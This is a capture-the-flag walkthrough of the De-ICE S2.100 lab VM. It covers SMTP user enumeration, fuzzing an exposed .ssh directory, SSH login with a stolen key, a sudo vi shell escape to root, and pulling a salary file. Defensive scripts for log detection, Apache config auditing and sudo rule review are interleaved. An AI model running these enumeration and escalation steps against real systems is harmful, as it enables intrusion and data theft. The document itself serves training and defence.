This is how I solved the De-ICE S2.100 challenge. The goal is to obtain salary information for the team of employees.
As usual I ran netdiscover on the subnet range, and straight away something jumped out.
This VM was hosting two Apache services on different IPs.
[email protected]:~/de-ice/2.100# netdiscover -r 192.168.2.0/24 -i eth2

Currently scanning: Finished!   |   Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
_____________________________________________________________________________
  IP            At MAC Address      Count  Len  MAC Vendor
-----------------------------------------------------------------------------
192.168.2.100   08:00:27:f6:e8:1d   01     060  CADMUS COMPUTER SYSTEMS
192.168.2.101   08:00:27:f6:e8:1d   01     060  CADMUS COMPUTER SYSTEMS
I then scanned the two IPs with nmap.
[email protected]:~/de-ice/2.100# nmap -n -sV -A -p- 192.168.2.100; nmap -n -sV -A -p- 192.168.2.101

PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "EOF"
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: CAPABILITY SCAN LOGIN-REFERRALS MAILBOX-REFERRALS MULTIAPPEND SORT UNSELECT NAMESPACE STARTTLS LITERAL+ IDLE THREAD=REFERENCES THREAD=ORDEREDSUBJECT OK IMAP4REV1 SASL-IR AUTH=LOGINA0001 completed BINARY
443/tcp closed https

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
The Apache service on .100 served a page containing a long list of names, and as before I used these to build a list of potential usernames. This list was quite a lot longer than in previous challenges, so brute-forcing SSH logins would have taken longer than I was willing to spend.
I decided to try to validate the usernames via the SMTP service instead. After experimenting with the different enumeration methods smtp-user-enum supports, I had a list of valid users.
[email protected]:~/de-ice/2.100# smtp-user-enum -M RCPT -f root@slax.example.net -U users -t 192.168.2.100
192.168.2.100: havisham exists
192.168.2.100: magwitch exists
192.168.2.100: pirrip exists
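From the defender's side, RCPT-based probing is the method that survives the usual Sendmail hardening (PrivacyOptions=goaway only silences VRFY and EXPN), so it has to be caught in the mail log. The script below is an added example and not part of the original walkthrough: it parses constructed maillog lines in Sendmail's check_rcpt reject format and flags any source address that triggered many distinct "User unknown" rejections inside a short window. The log lines, the host name slax, the probing source 192.168.2.200 and the thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed maillog excerpt (not taken from the challenge VM): one source
# probes six recipients in a few seconds, another source makes a single typo.
SAMPLE_MAILLOG = """\
Jan  8 10:01:02 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<aaron@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <aaron@slax.example.net>... User unknown
Jan  8 10:01:02 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<abel@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <abel@slax.example.net>... User unknown
Jan  8 10:01:03 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<adam@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <adam@slax.example.net>... User unknown
Jan  8 10:01:03 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<alice@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <alice@slax.example.net>... User unknown
Jan  8 10:01:04 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<arthur@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <arthur@slax.example.net>... User unknown
Jan  8 10:01:04 slax sendmail[2101]: n08A12aa002101: ruleset=check_rcpt, arg1=<betty@slax.example.net>, relay=[192.168.2.200], reject=550 5.1.1 <betty@slax.example.net>... User unknown
Jan  8 10:30:00 slax sendmail[2150]: n08AU00bb002150: ruleset=check_rcpt, arg1=<pirip@slax.example.net>, relay=[192.168.2.50], reject=550 5.1.1 <pirip@slax.example.net>... User unknown
"""

# One check_rcpt rejection: syslog timestamp, recipient, relaying source, 5.1.1 reason.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sendmail\[\d+\]: .*?"
    r"arg1=<(?P<rcpt>[^>]+)>, relay=\[?(?P<ip>[^\],]+)\]?, "
    r"reject=550 5\.1\.1 .*User unknown$"
)


def parse_unknown_rcpt(lines):
    """Yield (timestamp, source_ip, recipient) for each 'User unknown' reject."""
    for line in lines:
        m = REJECT_RE.match(line)
        if m:
            # syslog lines carry no year; strptime defaults it, which is fine for ordering
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            yield ts, m.group("ip"), m.group("rcpt")


def detect_rcpt_enumeration(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: peak distinct unknown recipients} for sources that
    hit at least `threshold` distinct unknown recipients within `window`."""
    by_ip = defaultdict(list)
    for ts, ip, rcpt in parse_unknown_rcpt(lines):
        by_ip[ip].append((ts, rcpt))

    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        recent = []  # sliding window of (timestamp, recipient)
        peak = 0
        for ts, rcpt in events:
            recent.append((ts, rcpt))
            recent = [e for e in recent if ts - e[0] <= window]
            peak = max(peak, len({r for _, r in recent}))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, count in detect_rcpt_enumeration(SAMPLE_MAILLOG.splitlines()).items():
        print(f"possible recipient enumeration from {ip}: {count} unknown users in one window")
```

The single typo from 192.168.2.50 stays below the threshold, while the burst from 192.168.2.200 is reported. On the server side the matching control in Sendmail is the BadRcptThrottle option, which slows a session down after a number of bad recipients and makes this kind of probing far less attractive than the quick run shown above.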
I continued to enumerate the other services, but nothing popped until I ran nikto against the Apache service on .101 (I can imagine that sent quite a few people crazy).
[email protected]:~/de-ice/2.100# nikto -h 192.168.2.101 -Display 124
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
It seemed that the root user’s home directory was accessible through Apache, although it appeared empty.
Wfuzz is a web crawler and fuzzing tool. With my list of valid users I was able to locate their home directories as well, but they also appeared empty. I then used wfuzz to look for hidden directories that commonly appear in users' home directories. I got a hit for a .ssh directory in pirrip's home directory, within which were
[email protected]:~/de-ice/2.100# wfuzz -c -z file,users --hc 404 http://192.168.2.101/~FUZZ/
00001:  C=200     11 L       46 W      570 Ch        " - havisham"
00002:  C=200     11 L       46 W      570 Ch        " - magwitch"
00003:  C=200     11 L       46 W      566 Ch        " - pirrip"

[email protected]:~/de-ice/2.100# wfuzz -c -zfile,users --hc 404 http://192.168.2.101/~FUZZ/.ssh
00003:  C=301      9 L       29 W      329 Ch        " - pirrip"
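What makes the wfuzz run above work is a mod_userdir configuration that maps /~user/ onto the home directory itself, with the root account not excluded and directory listings switched on. As an added example that is not part of the original walkthrough, the script below audits a httpd.conf fragment for exactly those three conditions; the weak and hardened fragments are constructed for the example and are not the challenge VM's real configuration, and the finding labels are my own.

```python
import re

# Constructed configuration fragments (assumptions, not the VM's actual httpd.conf).
# WEAK_CONF maps ~user to /home/<user>/ and lists directory contents, which is
# what lets /~pirrip/.ssh be found from the outside.
WEAK_CONF = """\
LoadModule userdir_module modules/mod_userdir.so
UserDir /home
<Directory /home/*/>
    Options Indexes FollowSymLinks
    AllowOverride None
</Directory>
"""

# HARDENED_CONF serves only a dedicated public_html subdirectory, excludes
# root, and disables listings.
HARDENED_CONF = """\
LoadModule userdir_module modules/mod_userdir.so
UserDir public_html
UserDir disabled root
<Directory /home/*/public_html>
    Options -Indexes
    AllowOverride None
</Directory>
"""

USERDIR_RE = re.compile(r"^\s*UserDir\s+(.+?)\s*$", re.M | re.I)
DIR_BLOCK_RE = re.compile(r'<Directory\s+"?([^">]+?)"?\s*>(.*?)</Directory>', re.S | re.I)
OPTIONS_RE = re.compile(r"^\s*Options\s+(.+)$", re.M | re.I)


def userdir_serves_home_root(value):
    """True when a UserDir path maps ~user onto the home directory itself.
    Relative values are a subdirectory of the home; absolute values with a
    '*' substitute the user name at the star; absolute values without one
    (e.g. '/home') resolve to <value>/<user>."""
    if value.startswith("/"):
        if "*" in value:
            return value.split("*", 1)[1].strip("/") == ""
        return True
    return value.strip("/") in ("", ".")


def audit_userdir(conf_text):
    """Return a list of finding labels for a mod_userdir configuration."""
    findings = []
    root_disabled = False
    for value in USERDIR_RE.findall(conf_text):
        words = value.split()
        keyword = words[0].lower()
        if keyword == "disabled":
            # 'UserDir disabled' alone disables everyone; 'disabled root ...' names users
            if len(words) == 1 or "root" in words[1:]:
                root_disabled = True
        elif keyword == "enabled":
            continue
        elif userdir_serves_home_root(words[0]):
            findings.append("home-root-served")
    if not root_disabled:
        findings.append("root-not-disabled")

    for path, body in DIR_BLOCK_RE.findall(conf_text):
        if not path.startswith("/home"):
            continue
        for opts in OPTIONS_RE.findall(body):
            if any(o.lower() in ("indexes", "+indexes") for o in opts.split()):
                findings.append(f"indexes-on:{path}")
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_userdir(WEAK_CONF))
    print("hardened:", audit_userdir(HARDENED_CONF))
```

One caveat the 301 in the second wfuzz run illustrates: Apache redirects a directory request to its trailing-slash form whether or not listings are enabled, so turning Indexes off alone still lets the existence of /~user/.ssh be confirmed. Pointing UserDir at a dedicated subdirectory, as in the hardened fragment, is what actually takes the dotfiles out of the web server's reach.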
I downloaded the id_rsa key and was able to SSH in as pirrip.
[email protected]:~/de-ice/2.100# chmod 400 id_rsa
[email protected]:~/de-ice/2.100# ssh -i id_rsa pirrip@192.168.2.100
Linux 2.6.16.
[email protected]:~$
Reviewing the passwd and group files showed that pirrip was part of the wheel group, but I was unable to use sudo as I didn’t know pirrip’s password.
I began looking through the filesystem and eventually came across /var/spool/mail/pirrip. In it was an email password reminder for pirrip; I tried this password with sudo and it worked.
[email protected]:~$ more /var/spool/mail/pirrip
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

[email protected]:~$ sudo -l
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL
I could now see the list of sudo rights for pirrip. I could have used these to read the shadow file and try to crack the root password. However, an easier route to a root shell is through the vi text editor.
[email protected]:~$ sudo vi
:!/bin/bash
bash-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
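The sudo rules above are a textbook case of granting a pager, an editor and two file readers as root: vi and more can spawn commands, and cat and tail can read any file, so none of the four entries is really narrower than full root. As an added example that is not part of the original walkthrough, the script below parses the sudo -l output quoted above and classifies each entry; the classification tables are my own short lists drawn from those tools' documented behaviour, not an exhaustive catalogue, and the extra NOEXEC line in the sample is constructed to show how tags are handled.

```python
import re

# The four entries from the sudo -l output quoted above, plus one constructed
# line with a NOEXEC tag (an assumption for the example, not from the VM).
SUDO_L_OUTPUT = """\
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat
    (root) NOEXEC: /usr/bin/less
"""

# Programs that let the invoking user run further commands from inside them,
# and programs that merely read any file the run-as user can read.
SHELL_ESCAPE = {"vi", "vim", "more", "less", "man"}
ARBITRARY_READ = {"cat", "tail", "head"}

# One rule line: "(runas) [TAG: ...] command".
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)", re.M
)


def audit_sudo_l(output):
    """Return (command, classification, runas) tuples for risky entries."""
    findings = []
    for m in ENTRY_RE.finditer(output):
        cmd, runas = m.group("cmd"), m.group("runas")
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        name = cmd.rsplit("/", 1)[-1]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted", runas))
        elif name in SHELL_ESCAPE:
            # NOEXEC stops the program from exec'ing children, so the ':!' and
            # '!' escapes fail; the program can still read and write files as root.
            kind = "shell-escape-blocked-by-noexec" if "NOEXEC" in tags else "shell-escape"
            findings.append((cmd, kind, runas))
        elif name in ARBITRARY_READ:
            findings.append((cmd, "arbitrary-file-read", runas))
    return findings


if __name__ == "__main__":
    for cmd, kind, runas in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"{cmd:<16} as {runas:<6} {kind}")
```

Adding the noexec tag closes the `:!/bin/bash` route but not the underlying problem: an editor run as root can still rewrite sudoers or drop a key into root's authorized_keys. For editing specific files the narrower grant is sudoedit, which copies the file to the user and back rather than running the editor as root at all.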
I then found /root/.save/. Trying to extract this directly on the server resulted in error messages about limited disk space, so I transferred the file to my Kali machine using netcat. No passwords were required to decompress, granting me access to
[email protected]:~/de-ice/2.100# unzip great_expectations.zip
[email protected]:~/de-ice/2.100# tar -xvf great_expectations.tar
[email protected]:~/de-ice/2.100# cat Jan08
Philip Pirrip:   734-67-0424   5.5%   $74,224
Abel Magwitch:   816-03-0028   4.0%   $53,122
Estella Havisham: 762-93-1073  12%    $84,325